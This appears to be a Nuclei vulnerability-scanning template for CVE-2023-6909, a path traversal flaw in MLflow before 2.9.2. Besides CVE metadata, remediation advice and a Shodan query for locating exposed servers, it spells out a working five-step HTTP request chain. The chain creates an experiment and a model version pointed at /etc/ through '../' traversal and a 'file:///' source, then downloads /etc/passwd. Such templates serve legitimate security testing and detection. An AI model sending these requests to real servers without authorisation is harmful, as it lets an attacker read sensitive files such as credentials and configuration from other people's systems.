id: CVE-2023-6909

info:
  name: Mlflow <2.9.2 - Path Traversal
  author: Hyunsoo-ds
  severity: high
  description: |
    Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
  impact: |
    Successful exploitation could lead to disclosure of sensitive information such as SSH keys or internal configuration files.
  remediation: |
    To fix this vulnerability, update the mlflow package to the latest version, 2.10.0.
  reference:
    - https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6909
    - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6909
    cwe-id: CWE-29
    epss-score: 0.00409
    epss-percentile: 0.73387
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: lfprojects
    product: mlflow
    shodan-query: "http.title:\"mlflow\""
  tags: cve,cve2023,mlflow,lfi,intrusive

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
        Host: {{Hostname}}

        {"name" : "{{randstr}}", "artifact_location": "http:///?/../../../../../../../../../../../../../../etc/"}

      - |
        POST /api/2.0/mlflow/runs/create HTTP/1.1
        Host: {{Hostname}}

        {"experiment_id": "{{EXPERIMENT_ID}}"}

      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}

        {"name": "{{randstr}}"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}

        {"name" : "{{randstr}}", "run_id": "{{RUN_ID}}", "source" : "file:///etc/"}

      - |
        GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header_5
        words:
          - "filename=passwd"
          - "application/octet-stream"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body_1
        name: EXPERIMENT_ID
        group: 1
        json:
          - '.experiment_id'
        internal: true

      - type: json
        part: body_2
        name: RUN_ID
        group: 1
        json:
          - '.run.info.run_id'
        internal: true
# digest: 490a00463044022062e417739d10a0345e088ba046630f61c75a6fb7c2640786cae6d7fe70c113da0220798d1ffc7b82d974779f27319ed421eb30bafdb7d6a1dbc125edc69436bef5e8:922c64590222798bb761d5b6d8e72950